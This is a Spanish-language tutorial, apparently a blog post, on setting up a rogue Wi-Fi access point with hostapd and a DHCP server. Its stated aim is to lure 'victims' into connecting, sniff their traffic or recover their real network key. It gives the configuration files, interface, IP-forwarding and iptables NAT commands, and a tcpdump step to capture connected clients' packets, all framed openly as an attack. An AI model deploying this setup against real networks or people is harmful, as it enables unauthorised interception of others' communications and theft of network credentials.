Improvisar un punto de acceso
inalámbrico por el que lanzar nuestra conexión a otros equipos wi-fi,
hasta para ser algo malvados... y utilizar nuestro recién creado punto
de acceso con el objetivo de que su/sus víctima/s se conecten a él, para
monitorear su trafico, o conseguir la clave de su verdadero ap (Cafe
Latte Attack).
Para
esto podemos configurar de tres maneras el AP, la más común es como un
AP abierto, configurando el AP de modo que responda a cualquier nombre
de ESSID. O configurando el AP como el Ap que normalmente utiliza la
víctima.
Luego entraremos en la manera de hacer que el cliente se conecte a el, por el momento vamos a crearlo.
Lo que vamos a necesitar es bien poco , nuestra tarjeta wi-fi (con los drivers de inyección), hostapd y un servidor DHCP.
El
proceso es muy similar a montar nuestro HOTSPOT con airbase, casi no
difiere en nada. Podríamos dividir ambos procesos en tres partes:
levantar y configurar nuestra tarjeta wifi en modo monitor, configurar
el dhcp que dará ip a los "clientes" y compartir Internet con los
"clientes".
Instalando lo necesario
Comenzaremos
por instalar hostapd y el servidor dhcp. Podemos instalar hostapd desde
los repositorios o bien bajarlo y compilarlo desde su pagina web.
apt-get install hostapd
apt-get install isc-dhcp-server
Una
vez bajado hostapd deberemos configurarlo. Para ello crearemos un
fichero "hostapd.conf" con el siguiente contenido (luego veremos otro
tipo de configuraciones):
#configuración Hostapd
interface=wlan0
driver=nl80211
ssid=Rogue
channel=1
En
esta configuración mínima estamos diciéndole que nuestra interfaz es
wlan0, su driver, el nombre del punto de acceso "Rogue" y que emita por
el canal uno.
Por ahora sencillo ¿no?
Configurando el DHCP server
Es una parte muy importante antes de levantar el servicio DHCP tener claro qué tarjeta va a ser la encargada de repartir las IP en nuestra máquina,
y la subnet en que va a estar. En nuestro caso le daremos la ip
10.0.0.1 con la máscara de red 255.255.255.0 y así lo declararemos en el
fichero de configuración de nuestro dhcp.
Para
decirle al dhcp que tarjeta va a ser la encargada de repartir las ip
deberemos editar el fichero /etc/default/isc-dhcp-server (este paso sera
diferente según que distribución utilices y que versión de servidor
dhcp) por ejemplo:
Fedora / RedHat / CentOS:
# File: /etc/sysconfig/dhcpd
DHCPDARGS=wlan0
Debian squezze / Ubuntu:
# File: /etc/default/dhcp3-server
INTERFACES="eth0"
Debian jessie
#file: /etc/default/isc-dhcp-server
El fichero de configuracion de dhcp /etc/dhcpd/dhcpd.conf quedaría tal que así:
ddns-update-style none;
ignore client-updates;
authoritative;
option local-wpad code 252 = text;
subnet
10.0.0.0 netmask 255.255.255.0 {
# --- default gateway
option routers 10.0.0.1;
# --- Netmask
option subnet-mask 255.255.255.0;
# --- Broadcast Address
option broadcast-address
10.0.0.255;
# --- Domain name servers, tells the clients which DNS servers to use.
option domain-name-servers 10.0.0.1, 8.8.8.8, 8.8.4.4;
option time-offset 0;
range 10.0.0.3 10.0.0.13;
default-lease-time 1209600;
max-lease-time 1814400;
}
Bueno
ya tenemos configurada la mayor parte ahora vamos con la interface. En
primer lugar pararemos "networ manager" para que no nos de la lata:
/etc/init.d/network-manager stop
Luego bajaremos la wlan0 para cambiarle la ip:
ifconfig wlan0 down
ifconfig wlan0 10.0.0.1 netmask 255.255.255.0
ifconfig wlan0 up
después levantaremos el servicio dhcp:
/etc/init.d/isc-dhcp-server restart
y levantaremos nuestro falso AP:
hostapd hostapd.conf
Hasta aquí sencillo tan solo nos falta compartir nuestra conexión para que los clientes tengan alcance la inet...
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -A FORWARD -i wlan0 -j ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE
Y con esto y bizcocho!!
Lo que podemos hacer también es un pequeño script para que a la hora de levantar nuestro AP sea todo mas rápido:
Llevando el cliente hacia nuestro Rogue AP
Una
vez tenemos nuestro Rogue AP podemos utilizar varias técnicas para
engañar al cliente dependiendo de cual es nuestro objetivo, para que al
fin y al cabo todo acabe como muestra la imagen de la izquierda.
Una
vez conectado el cliente a nuestro pícaro punto de acceso somos dueños y
señores de sus paquetes y podemos hacer de el lo que nos plazca...
Para ver su tráfico por ejemplo solo tendríamos que arrancar nuestro sniffer preferido:
tcpdump por ejemplo:
tcpdump -i wlan0